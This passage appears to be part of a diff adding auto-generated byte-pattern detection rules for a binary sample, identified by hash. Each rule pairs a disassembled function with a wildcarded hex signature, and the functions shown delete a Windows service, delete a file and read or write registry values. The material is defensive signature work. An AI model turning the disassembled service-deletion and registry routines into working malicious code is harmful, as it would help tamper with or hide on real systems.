33 C0 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x00402900@b94af4a4d4af6eac81fc135abda1c40c with 3 features: + - delete file + - delete service + - query environment variable + .text:0x00402900 + .text:0x00402900 FUNC: int cdecl sub_00402900( int arg0, ) [4 XREFS] + .text:0x00402900 + .text:0x00402900 Stack Variables: (offset from initial top of stack) + .text:0x00402900 4: int arg0 + .text:0x00402900 -1028: int local1028 + .text:0x00402900 -1032: int local1032 + .text:0x00402900 -2056: int local2056 + .text:0x00402900 -3080: int local3080 + .text:0x00402900 -3084: int local3084 + .text:0x00402900 + .text:0x00402900 55 push ebp + .text:0x00402901 8bec mov ebp,esp + .text:0x00402903 81ec080c0000 sub esp,3080 + .text:0x00402909 53 push ebx + .text:0x0040290a 56 push esi + .text:0x0040290b 57 push edi + .text:0x0040290c 683f000f00 push 0x000f003f + .text:0x00402911 6a00 push 0 + .text:0x00402913 6a00 push 0 + .text:0x00402915 ff1500b04000 call dword [0x0040b000] ;advapi32.OpenSCManagerA(0,0,0x000f003f) + .text:0x0040291b 8985fcfbffff mov dword [ebp - 1028],eax + .text:0x00402921 83bdfcfbffff00 cmp dword [ebp - 1028],0 + .text:0x00402928 750a jnz 0x00402934 + .text:0x0040292a b801000000 mov eax,1 + .text:0x0040292f e9b3010000 jmp 0x00402ae7 + .text:0x00402934 loc_00402934: [1 XREFS] + .text:0x00402934 68ff010f00 push 0x000f01ff + .text:0x00402939 8b4508 mov eax,dword [ebp + 8] + .text:0x0040293c 50 push eax + .text:0x0040293d 8b8dfcfbffff mov ecx,dword [ebp - 1028] + .text:0x00402943 51 push ecx + .text:0x00402944 ff1504b04000 call dword [0x0040b004] ;advapi32.OpenServiceA(advapi32.OpenSCManagerA(0,0,0x000f003f),arg0,0x000f01ff) + .text:0x0040294a 8985f8f3ffff mov dword [ebp - 3080],eax + .text:0x00402950 83bdf8f3ffff00 cmp dword [ebp - 3080],0 + .text:0x00402957 7517 jnz 0x00402970 + .text:0x00402959 8b95fcfbffff mov edx,dword [ebp - 1028] + .text:0x0040295f 52 push edx + .text:0x00402960 ff150cb04000 call dword [0x0040b00c] ;advapi32.CloseServiceHandle(<0x00402915>) + 
.text:0x00402966 b801000000 mov eax,1 + .text:0x0040296b e977010000 jmp 0x00402ae7 + .text:0x00402970 loc_00402970: [1 XREFS] + .text:0x00402970 8b85f8f3ffff mov eax,dword [ebp - 3080] + .text:0x00402976 50 push eax + .text:0x00402977 ff1528b04000 call dword [0x0040b028] ;advapi32.DeleteService(advapi32.OpenServiceA(<0x00402915>,arg0,0x000f01ff)) + .text:0x0040297d 85c0 test eax,eax + .text:0x0040297f 7524 jnz 0x004029a5 + .text:0x00402981 8b8dfcfbffff mov ecx,dword [ebp - 1028] + .text:0x00402987 51 push ecx + .text:0x00402988 ff150cb04000 call dword [0x0040b00c] ;advapi32.CloseServiceHandle(<0x00402915>) + .text:0x0040298e 8b95f8f3ffff mov edx,dword [ebp - 3080] + .text:0x00402994 52 push edx + .text:0x00402995 ff150cb04000 call dword [0x0040b00c] ;advapi32.CloseServiceHandle(<0x00402944>) + .text:0x0040299b b801000000 mov eax,1 + .text:0x004029a0 e942010000 jmp 0x00402ae7 + .text:0x004029a5 loc_004029a5: [1 XREFS] + .text:0x004029a5 8b85fcfbffff mov eax,dword [ebp - 1028] + .text:0x004029ab 50 push eax + .text:0x004029ac ff150cb04000 call dword [0x0040b00c] ;advapi32.CloseServiceHandle(<0x00402915>) + .text:0x004029b2 8b8df8f3ffff mov ecx,dword [ebp - 3080] + .text:0x004029b8 51 push ecx + .text:0x004029b9 ff150cb04000 call dword [0x0040b00c] ;advapi32.CloseServiceHandle(<0x00402944>) + .text:0x004029bf 6800040000 push 1024 + .text:0x004029c4 8d95fcf3ffff lea edx,dword [ebp - 3076] + .text:0x004029ca 52 push edx + .text:0x004029cb e8e0fbffff call 0x004025b0 ;sub_004025b0(local3080) + .text:0x004029d0 83c408 add esp,8 + .text:0x004029d3 85c0 test eax,eax + .text:0x004029d5 740a jz 0x004029e1 + .text:0x004029d7 b801000000 mov eax,1 + .text:0x004029dc e906010000 jmp 0x00402ae7 + .text:0x004029e1 loc_004029e1: [1 XREFS] + .text:0x004029e1 bf34c14000 mov edi,0x0040c134 + .text:0x004029e6 8d9500fcffff lea edx,dword [ebp - 1024] + .text:0x004029ec 83c9ff or ecx,0xffffffff + .text:0x004029ef 33c0 xor eax,eax + .text:0x004029f1 f2ae repnz: scasb + .text:0x004029f3 f7d1 
not ecx + .text:0x004029f5 2bf9 sub edi,ecx + .text:0x004029f7 8bf7 mov esi,edi + .text:0x004029f9 8bc1 mov eax,ecx + .text:0x004029fb 8bfa mov edi,edx + .text:0x004029fd c1e902 shr ecx,2 + .text:0x00402a00 f3a5 rep: movsd + .text:0x00402a02 8bc8 mov ecx,eax + .text:0x00402a04 83e103 and ecx,3 + .text:0x00402a07 f3a4 rep: movsb + .text:0x00402a09 8dbdfcf3ffff lea edi,dword [ebp - 3076] + .text:0x00402a0f 8d9500fcffff lea edx,dword [ebp - 1024] + .text:0x00402a15 83c9ff or ecx,0xffffffff + .text:0x00402a18 33c0 xor eax,eax + .text:0x00402a1a f2ae repnz: scasb + .text:0x00402a1c f7d1 not ecx + .text:0x00402a1e 2bf9 sub edi,ecx + .text:0x00402a20 8bf7 mov esi,edi + .text:0x00402a22 8bd9 mov ebx,ecx + .text:0x00402a24 8bfa mov edi,edx + .text:0x00402a26 83c9ff or ecx,0xffffffff + .text:0x00402a29 33c0 xor eax,eax + .text:0x00402a2b f2ae repnz: scasb + .text:0x00402a2d 83c7ff add edi,0xffffffff + .text:0x00402a30 8bcb mov ecx,ebx + .text:0x00402a32 c1e902 shr ecx,2 + .text:0x00402a35 f3a5 rep: movsd + .text:0x00402a37 8bcb mov ecx,ebx + .text:0x00402a39 83e103 and ecx,3 + .text:0x00402a3c f3a4 rep: movsb + .text:0x00402a3e bf2cc14000 mov edi,0x0040c12c + .text:0x00402a43 8d9500fcffff lea edx,dword [ebp - 1024] + .text:0x00402a49 83c9ff or ecx,0xffffffff + .text:0x00402a4c 33c0 xor eax,eax + .text:0x00402a4e f2ae repnz: scasb + .text:0x00402a50 f7d1 not ecx + .text:0x00402a52 2bf9 sub edi,ecx + .text:0x00402a54 8bf7 mov esi,edi + .text:0x00402a56 8bd9 mov ebx,ecx + .text:0x00402a58 8bfa mov edi,edx + .text:0x00402a5a 83c9ff or ecx,0xffffffff + .text:0x00402a5d 33c0 xor eax,eax + .text:0x00402a5f f2ae repnz: scasb + .text:0x00402a61 83c7ff add edi,0xffffffff + .text:0x00402a64 8bcb mov ecx,ebx + .text:0x00402a66 c1e902 shr ecx,2 + .text:0x00402a69 f3a5 rep: movsd + .text:0x00402a6b 8bcb mov ecx,ebx + .text:0x00402a6d 83e103 and ecx,3 + .text:0x00402a70 f3a4 rep: movsb + .text:0x00402a72 6800040000 push 1024 + .text:0x00402a77 8d85fcf7ffff lea eax,dword [ebp - 2052] + 
.text:0x00402a7d 50 push eax + .text:0x00402a7e 8d8d00fcffff lea ecx,dword [ebp - 1024] + .text:0x00402a84 51 push ecx + .text:0x00402a85 ff1530b04000 call dword [0x0040b030] ;kernel32.ExpandEnvironmentStringsA(local1028,local2056,1024) + .text:0x00402a8b 85c0 test eax,eax + .text:0x00402a8d 7507 jnz 0x00402a96 + .text:0x00402a8f b801000000 mov eax,1 + .text:0x00402a94 eb51 jmp 0x00402ae7 + .text:0x00402a96 loc_00402a96: [1 XREFS] + .text:0x00402a96 8d95fcf7ffff lea edx,dword [ebp - 2052] + .text:0x00402a9c 52 push edx + .text:0x00402a9d ff1560b04000 call dword [0x0040b060] ;kernel32.DeleteFileA(local2056) + .text:0x00402aa3 85c0 test eax,eax + .text:0x00402aa5 7507 jnz 0x00402aae + .text:0x00402aa7 b801000000 mov eax,1 + .text:0x00402aac eb39 jmp 0x00402ae7 + .text:0x00402aae loc_00402aae: [1 XREFS] + .text:0x00402aae 6860eb4000 push 0x0040eb60 + .text:0x00402ab3 6860eb4000 push 0x0040eb60 + .text:0x00402ab8 6860eb4000 push 0x0040eb60 + .text:0x00402abd 6860eb4000 push 0x0040eb60 + .text:0x00402ac2 e8a9e5ffff call 0x00401070 ;sub_00401070(0x0040eb60,0x0040eb60,0x0040eb60,0x0040eb60) + .text:0x00402ac7 83c410 add esp,16 + .text:0x00402aca 85c0 test eax,eax + .text:0x00402acc 7407 jz 0x00402ad5 + .text:0x00402ace b801000000 mov eax,1 + .text:0x00402ad3 eb12 jmp 0x00402ae7 + .text:0x00402ad5 loc_00402ad5: [1 XREFS] + .text:0x00402ad5 e836e7ffff call 0x00401210 ;sub_00401210() + .text:0x00402ada 85c0 test eax,eax + .text:0x00402adc 7407 jz 0x00402ae5 + .text:0x00402ade b801000000 mov eax,1 + .text:0x00402ae3 eb02 jmp 0x00402ae7 + .text:0x00402ae5 loc_00402ae5: [1 XREFS] + .text:0x00402ae5 33c0 xor eax,eax + .text:0x00402ae7 loc_00402ae7: [8 XREFS] + .text:0x00402ae7 5f pop edi + .text:0x00402ae8 5e pop esi + .text:0x00402ae9 5b pop ebx + .text:0x00402aea 8be5 mov esp,ebp + .text:0x00402aec 5d pop ebp + .text:0x00402aed c3 ret + */ + $c54 = { 55 8B EC 81 EC 08 0C 00 00 53 56 57 68 3F 00 0F 00 6A 00 6A 00 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? 
B8 01 00 00 00 E9 ?? ?? ?? ?? 68 FF 01 0F 00 8B 45 ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 68 00 04 00 00 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 08 85 C0 74 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? BF 34 C1 40 00 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B C1 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8D BD ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B D9 8B FA 83 C9 FF 33 C0 F2 AE 83 C7 FF 8B CB C1 E9 02 F3 A5 8B CB 83 E1 03 F3 A4 BF 2C C1 40 00 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B D9 8B FA 83 C9 FF 33 C0 F2 AE 83 C7 FF 8B CB C1 E9 02 F3 A5 8B CB 83 E1 03 F3 A4 68 00 04 00 00 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 85 C0 75 ?? B8 01 00 00 00 EB ?? 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? B8 01 00 00 00 EB ?? 68 60 EB 40 00 68 60 EB 40 00 68 60 EB 40 00 68 60 EB 40 00 E8 ?? ?? ?? ?? 83 C4 10 85 C0 74 ?? B8 01 00 00 00 EB ?? E8 ?? ?? ?? ?? 85 C0 74 ?? B8 01 00 00 00 EB ?? 
33 C0 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x004015b0@b94af4a4d4af6eac81fc135abda1c40c with 1 features: + - get common file path + .text:0x004015b0 + .text:0x004015b0 FUNC: int thiscall_caller sub_004015b0( void * ecx, int arg1, ) [4 XREFS] + .text:0x004015b0 + .text:0x004015b0 Stack Variables: (offset from initial top of stack) + .text:0x004015b0 4: int arg1 + .text:0x004015b0 -1028: int local1028 + .text:0x004015b0 + .text:0x004015b0 55 push ebp + .text:0x004015b1 8bec mov ebp,esp + .text:0x004015b3 81ec00040000 sub esp,1024 + .text:0x004015b9 53 push ebx + .text:0x004015ba 56 push esi + .text:0x004015bb 57 push edi + .text:0x004015bc 6800040000 push 1024 + .text:0x004015c1 8d8500fcffff lea eax,dword [ebp - 1024] + .text:0x004015c7 50 push eax + .text:0x004015c8 ff1550b04000 call dword [0x0040b050] ;kernel32.GetSystemDirectoryA(local1028,1024) + .text:0x004015ce 85c0 test eax,eax + .text:0x004015d0 7507 jnz 0x004015d9 + .text:0x004015d2 b801000000 mov eax,1 + .text:0x004015d7 eb54 jmp 0x0040162d + .text:0x004015d9 loc_004015d9: [1 XREFS] + .text:0x004015d9 bf58c04000 mov edi,0x0040c058 + .text:0x004015de 8d9500fcffff lea edx,dword [ebp - 1024] + .text:0x004015e4 83c9ff or ecx,0xffffffff + .text:0x004015e7 33c0 xor eax,eax + .text:0x004015e9 f2ae repnz: scasb + .text:0x004015eb f7d1 not ecx + .text:0x004015ed 2bf9 sub edi,ecx + .text:0x004015ef 8bf7 mov esi,edi + .text:0x004015f1 8bd9 mov ebx,ecx + .text:0x004015f3 8bfa mov edi,edx + .text:0x004015f5 83c9ff or ecx,0xffffffff + .text:0x004015f8 33c0 xor eax,eax + .text:0x004015fa f2ae repnz: scasb + .text:0x004015fc 83c7ff add edi,0xffffffff + .text:0x004015ff 8bcb mov ecx,ebx + .text:0x00401601 c1e902 shr ecx,2 + .text:0x00401604 f3a5 rep: movsd + .text:0x00401606 8bcb mov ecx,ebx + .text:0x00401608 83e103 and ecx,3 + .text:0x0040160b f3a4 rep: movsb + .text:0x0040160d 8d8500fcffff lea eax,dword [ebp - 1024] + .text:0x00401613 50 push eax + .text:0x00401614 8b4d08 mov ecx,dword [ebp + 8] + .text:0x00401617 51 
push ecx + .text:0x00401618 e8c3feffff call 0x004014e0 ;sub_004014e0(arg1,local1028) + .text:0x0040161d 83c408 add esp,8 + .text:0x00401620 85c0 test eax,eax + .text:0x00401622 7407 jz 0x0040162b + .text:0x00401624 b801000000 mov eax,1 + .text:0x00401629 eb02 jmp 0x0040162d + .text:0x0040162b loc_0040162b: [1 XREFS] + .text:0x0040162b 33c0 xor eax,eax + .text:0x0040162d loc_0040162d: [2 XREFS] + .text:0x0040162d 5f pop edi + .text:0x0040162e 5e pop esi + .text:0x0040162f 5b pop ebx + .text:0x00401630 8be5 mov esp,ebp + .text:0x00401632 5d pop ebp + .text:0x00401633 c3 ret + */ + $c55 = { 55 8B EC 81 EC 00 04 00 00 53 56 57 68 00 04 00 00 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? B8 01 00 00 00 EB ?? BF 58 C0 40 00 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B D9 8B FA 83 C9 FF 33 C0 F2 AE 83 C7 FF 8B CB C1 E9 02 F3 A5 8B CB 83 E1 03 F3 A4 8D 85 ?? ?? ?? ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 08 85 C0 74 ?? B8 01 00 00 00 EB ?? 33 C0 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x00401000@b94af4a4d4af6eac81fc135abda1c40c with 1 features: + - query or enumerate registry value + .text:0x00401000 Segment: .text (40960 bytes) + .text:0x00401000 + .text:0x00401000 FUNC: int cdecl sub_00401000( ) [2 XREFS] + .text:0x00401000 + .text:0x00401000 Stack Variables: (offset from initial top of stack) + .text:0x00401000 -8: int local8 + .text:0x00401000 -12: int local12 + .text:0x00401000 + .text:0x00401000 55 push ebp + .text:0x00401001 8bec mov ebp,esp + .text:0x00401003 83ec08 sub esp,8 + .text:0x00401006 8d45f8 lea eax,dword [ebp - 8] + .text:0x00401009 50 push eax + .text:0x0040100a 683f000f00 push 0x000f003f + .text:0x0040100f 6a00 push 0 + .text:0x00401011 6840c04000 push 0x0040c040 + .text:0x00401016 6802000080 push 0x80000002 + .text:0x0040101b ff1520b04000 call dword [0x0040b020] ;advapi32.RegOpenKeyExA(0x80000002,0x0040c040,0,0x000f003f,local12) + .text:0x00401021 85c0 test eax,eax + .text:0x00401023 7404 jz 0x00401029 + .text:0x00401025 33c0 xor 
eax,eax + .text:0x00401027 eb3d jmp 0x00401066 + .text:0x00401029 loc_00401029: [1 XREFS] + .text:0x00401029 6a00 push 0 + .text:0x0040102b 6a00 push 0 + .text:0x0040102d 6a00 push 0 + .text:0x0040102f 6a00 push 0 + .text:0x00401031 6830c04000 push 0x0040c030 + .text:0x00401036 8b4df8 mov ecx,dword [ebp - 8] + .text:0x00401039 51 push ecx + .text:0x0040103a ff1524b04000 call dword [0x0040b024] ;advapi32.RegQueryValueExA(0xfefefefe,0x0040c030,0,0,0,0) + .text:0x00401040 8945fc mov dword [ebp - 4],eax + .text:0x00401043 837dfc00 cmp dword [ebp - 4],0 + .text:0x00401047 740e jz 0x00401057 + .text:0x00401049 8b55f8 mov edx,dword [ebp - 8] + .text:0x0040104c 52 push edx + .text:0x0040104d ff1564b04000 call dword [0x0040b064] ;kernel32.CloseHandle(0xfefefefe) + .text:0x00401053 33c0 xor eax,eax + .text:0x00401055 eb0f jmp 0x00401066 + .text:0x00401057 loc_00401057: [1 XREFS] + .text:0x00401057 8b45f8 mov eax,dword [ebp - 8] + .text:0x0040105a 50 push eax + .text:0x0040105b ff1564b04000 call dword [0x0040b064] ;kernel32.CloseHandle(0xfefefefe) + .text:0x00401061 b801000000 mov eax,1 + .text:0x00401066 loc_00401066: [2 XREFS] + .text:0x00401066 8be5 mov esp,ebp + .text:0x00401068 5d pop ebp + .text:0x00401069 c3 ret + */ + $c56 = { 55 8B EC 83 EC 08 8D 45 ?? 50 68 3F 00 0F 00 6A 00 68 40 C0 40 00 68 02 00 00 80 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 33 C0 EB ?? 6A 00 6A 00 6A 00 6A 00 68 30 C0 40 00 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? 00 74 ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 33 C0 EB ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 
B8 01 00 00 00 8B E5 5D C3 } + /* +function at 0x00401280@b94af4a4d4af6eac81fc135abda1c40c with 1 features: + - query or enumerate registry value + .text:0x00401280 + .text:0x00401280 FUNC: int cdecl sub_00401280( int arg0, int arg1, int arg2, int arg3, int arg4, int arg5, int arg6, ) [8 XREFS] + .text:0x00401280 + .text:0x00401280 Stack Variables: (offset from initial top of stack) + .text:0x00401280 28: int arg6 + .text:0x00401280 24: int arg5 + .text:0x00401280 20: int arg4 + .text:0x00401280 16: int arg3 + .text:0x00401280 12: int arg2 + .text:0x00401280 8: int arg1 + .text:0x00401280 4: int arg0 + .text:0x00401280 -8: int local8 + .text:0x00401280 -12: int local12 + .text:0x00401280 -4108: int local4108 + .text:0x00401280 -4112: int local4112 + .text:0x00401280 -4116: int local4116 + .text:0x00401280 + .text:0x00401280 55 push ebp + .text:0x00401281 8bec mov ebp,esp + .text:0x00401283 b810100000 mov eax,0x00001010 + .text:0x00401288 e8231c0000 call 0x00402eb0 ;__alloca_probe() + .text:0x0040128d 56 push esi + .text:0x0040128e 57 push edi + .text:0x0040128f c745f801100000 mov dword [ebp - 8],0x00001001 + .text:0x00401296 8d85f0efffff lea eax,dword [ebp - 4112] + .text:0x0040129c 50 push eax + .text:0x0040129d 683f000f00 push 0x000f003f + .text:0x004012a2 6a00 push 0 + .text:0x004012a4 6840c04000 push 0x0040c040 + .text:0x004012a9 6802000080 push 0x80000002 + .text:0x004012ae ff1520b04000 call dword [0x0040b020] ;advapi32.RegOpenKeyExA(0x80000002,0x0040c040,0,0x000f003f,local4116) + .text:0x004012b4 85c0 test eax,eax + .text:0x004012b6 740a jz 0x004012c2 + .text:0x004012b8 b801000000 mov eax,1 + .text:0x004012bd e94f010000 jmp 0x00401411 + .text:0x004012c2 loc_004012c2: [1 XREFS] + .text:0x004012c2 8d4df8 lea ecx,dword [ebp - 8] + .text:0x004012c5 51 push ecx + .text:0x004012c6 8d95f8efffff lea edx,dword [ebp - 4104] + .text:0x004012cc 52 push edx + .text:0x004012cd 6a00 push 0 + .text:0x004012cf 6a00 push 0 + .text:0x004012d1 6830c04000 push 0x0040c030 + 
.text:0x004012d6 8b85f0efffff mov eax,dword [ebp - 4112] + .text:0x004012dc 50 push eax + .text:0x004012dd ff1524b04000 call dword [0x0040b024] ;advapi32.RegQueryValueExA(0xfefefefe,0x0040c030,0,0,local4108,local12) + .text:0x004012e3 8985f4efffff mov dword [ebp - 4108],eax + .text:0x004012e9 83bdf4efffff00 cmp dword [ebp - 4108],0 + .text:0x004012f0 7417 jz 0x00401309 + .text:0x004012f2 8b8df0efffff mov ecx,dword [ebp - 4112] + .text:0x004012f8 51 push ecx + .text:0x004012f9 ff1564b04000 call dword [0x0040b064] ;kernel32.CloseHandle(0xfefefefe) + .text:0x004012ff b801000000 mov eax,1 + .text:0x00401304 e908010000 jmp 0x00401411 + .text:0x00401309 loc_00401309: [1 XREFS] + .text:0x00401309 8d95f8efffff lea edx,dword [ebp - 4104] + .text:0x0040130f 8955fc mov dword [ebp - 4],edx + .text:0x00401312 8b7dfc mov edi,dword [ebp - 4] + .text:0x00401315 8b5508 mov edx,dword [ebp + 8] + .text:0x00401318 83c9ff or ecx,0xffffffff + .text:0x0040131b 33c0 xor eax,eax + .text:0x0040131d f2ae repnz: scasb + .text:0x0040131f f7d1 not ecx + .text:0x00401321 2bf9 sub edi,ecx + .text:0x00401323 8bf7 mov esi,edi + .text:0x00401325 8bc1 mov eax,ecx + .text:0x00401327 8bfa mov edi,edx + .text:0x00401329 c1e902 shr ecx,2 + .text:0x0040132c f3a5 rep: movsd + .text:0x0040132e 8bc8 mov ecx,eax + .text:0x00401330 83e103 and ecx,3 + .text:0x00401333 f3a4 rep: movsb + .text:0x00401335 8b7d08 mov edi,dword [ebp + 8] + .text:0x00401338 83c9ff or ecx,0xffffffff + .text:0x0040133b 33c0 xor eax,eax + .text:0x0040133d f2ae repnz: scasb + .text:0x0040133f f7d1 not ecx + .text:0x00401341 83c1ff add ecx,0xffffffff + .text:0x00401344 8b55fc mov edx,dword [ebp - 4] + .text:0x00401347 8d440a01 lea eax,dword [edx + ecx + 1] + .text:0x0040134b 8945fc mov dword [ebp - 4],eax + .text:0x0040134e 8b7dfc mov edi,dword [ebp - 4] + .text:0x00401351 8b5510 mov edx,dword [ebp + 16] + .text:0x00401354 83c9ff or ecx,0xffffffff + .text:0x00401357 33c0 xor eax,eax + .text:0x00401359 f2ae repnz: scasb + .text:0x0040135b 
f7d1 not ecx + .text:0x0040135d 2bf9 sub edi,ecx + .text:0x0040135f 8bf7 mov esi,edi + .text:0x00401361 8bc1 mov eax,ecx + .text:0x00401363 8bfa mov edi,edx + .text:0x00401365 c1e902 shr ecx,2 + .text:0x00401368 f3a5 rep: movsd + .text:0x0040136a 8bc8 mov ecx,eax + .text:0x0040136c 83e103 and ecx,3 + .text:0x0040136f f3a4 rep: movsb + .text:0x00401371 8b7d10 mov edi,dword [ebp + 16] + .text:0x00401374 83c9ff or ecx,0xffffffff + .text:0x00401377 33c0 xor eax,eax + .text:0x00401379 f2ae repnz: scasb + .text:0x0040137b f7d1 not ecx + .text:0x0040137d 83c1ff add ecx,0xffffffff + .text:0x00401380 8b55fc mov edx,dword [ebp - 4] + .text:0x00401383 8d440a01 lea eax,dword [edx + ecx + 1] + .text:0x00401387 8945fc mov dword [ebp - 4],eax + .text:0x0040138a 8b7dfc mov edi,dword [ebp - 4] + .text:0x0040138d 8b5518 mov edx,dword [ebp + 24] + .text:0x00401390 83c9ff or ecx,0xffffffff + .text:0x00401393 33c0 xor eax,eax + .text:0x00401395 f2ae repnz: scasb + .text:0x00401397 f7d1 not ecx + .text:0x00401399 2bf9 sub edi,ecx + .text:0x0040139b 8bf7 mov esi,edi + .text:0x0040139d 8bc1 mov eax,ecx + .text:0x0040139f 8bfa mov edi,edx + .text:0x004013a1 c1e902 shr ecx,2 + .text:0x004013a4 f3a5 rep: movsd + .text:0x004013a6 8bc8 mov ecx,eax + .text:0x004013a8 83e103 and ecx,3 + .text:0x004013ab f3a4 rep: movsb + .text:0x004013ad 8b7d18 mov edi,dword [ebp + 24] + .text:0x004013b0 83c9ff or ecx,0xffffffff + .text:0x004013b3 33c0 xor eax,eax + .text:0x004013b5 f2ae repnz: scasb + .text:0x004013b7 f7d1 not ecx + .text:0x004013b9 83c1ff add ecx,0xffffffff + .text:0x004013bc 8b55fc mov edx,dword [ebp - 4] + .text:0x004013bf 8d440a01 lea eax,dword [edx + ecx + 1] + .text:0x004013c3 8945fc mov dword [ebp - 4],eax + .text:0x004013c6 8b7dfc mov edi,dword [ebp - 4] + .text:0x004013c9 8b5520 mov edx,dword [ebp + 32] + .text:0x004013cc 83c9ff or ecx,0xffffffff + .text:0x004013cf 33c0 xor eax,eax + .text:0x004013d1 f2ae repnz: scasb + .text:0x004013d3 f7d1 not ecx + .text:0x004013d5 2bf9 sub edi,ecx 
+ .text:0x004013d7 8bf7 mov esi,edi + .text:0x004013d9 8bc1 mov eax,ecx + .text:0x004013db 8bfa mov edi,edx + .text:0x004013dd c1e902 shr ecx,2 + .text:0x004013e0 f3a5 rep: movsd + .text:0x004013e2 8bc8 mov ecx,eax + .text:0x004013e4 83e103 and ecx,3 + .text:0x004013e7 f3a4 rep: movsb + .text:0x004013e9 8b7d20 mov edi,dword [ebp + 32] + .text:0x004013ec 83c9ff or ecx,0xffffffff + .text:0x004013ef 33c0 xor eax,eax + .text:0x004013f1 f2ae repnz: scasb + .text:0x004013f3 f7d1 not ecx + .text:0x004013f5 83c1ff add ecx,0xffffffff + .text:0x004013f8 8b55fc mov edx,dword [ebp - 4] + .text:0x004013fb 8d440a01 lea eax,dword [edx + ecx + 1] + .text:0x004013ff 8945fc mov dword [ebp - 4],eax + .text:0x00401402 8b8df0efffff mov ecx,dword [ebp - 4112] + .text:0x00401408 51 push ecx + .text:0x00401409 ff1564b04000 call dword [0x0040b064] ;kernel32.CloseHandle(0xfefefefe) + .text:0x0040140f 33c0 xor eax,eax + .text:0x00401411 loc_00401411: [2 XREFS] + .text:0x00401411 5f pop edi + .text:0x00401412 5e pop esi + .text:0x00401413 8be5 mov esp,ebp + .text:0x00401415 5d pop ebp + .text:0x00401416 c3 ret + */ + $c57 = { 55 8B EC B8 10 10 00 00 E8 ?? ?? ?? ?? 56 57 C7 45 ?? 01 10 00 00 8D 85 ?? ?? ?? ?? 50 68 3F 00 0F 00 6A 00 68 40 C0 40 00 68 02 00 00 80 FF 15 ?? ?? ?? ?? 85 C0 74 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 8D 4D ?? 51 8D 95 ?? ?? ?? ?? 52 6A 00 6A 00 68 30 C0 40 00 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 74 ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 89 55 ?? 8B 7D ?? 8B 55 ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B C1 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8B 7D ?? 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 8B 55 ?? 8D 44 0A ?? 89 45 ?? 8B 7D ?? 8B 55 ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B C1 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8B 7D ?? 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 8B 55 ?? 8D 44 0A ?? 89 45 ?? 8B 7D ?? 8B 55 ?? 
83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B C1 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8B 7D ?? 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 8B 55 ?? 8D 44 0A ?? 89 45 ?? 8B 7D ?? 8B 55 ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B C1 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8B 7D ?? 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 8B 55 ?? 8D 44 0A ?? 89 45 ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 33 C0 5F 5E 8B E5 5D C3 } + /* +function at 0x00401070@b94af4a4d4af6eac81fc135abda1c40c with 1 features: + - set registry value + .text:0x00401070 + .text:0x00401070 FUNC: int cdecl sub_00401070( int arg0, int arg1, int arg2, int arg3, ) [6 XREFS] + .text:0x00401070 + .text:0x00401070 Stack Variables: (offset from initial top of stack) + .text:0x00401070 16: int arg3 + .text:0x00401070 12: int arg2 + .text:0x00401070 8: int arg1 + .text:0x00401070 4: int arg0 + .text:0x00401070 -8: int local8 + .text:0x00401070 -4108: int local4108 + .text:0x00401070 -4112: int local4112 + .text:0x00401070 + .text:0x00401070 55 push ebp + .text:0x00401071 8bec mov ebp,esp + .text:0x00401073 b80c100000 mov eax,0x0000100c + .text:0x00401078 e8331e0000 call 0x00402eb0 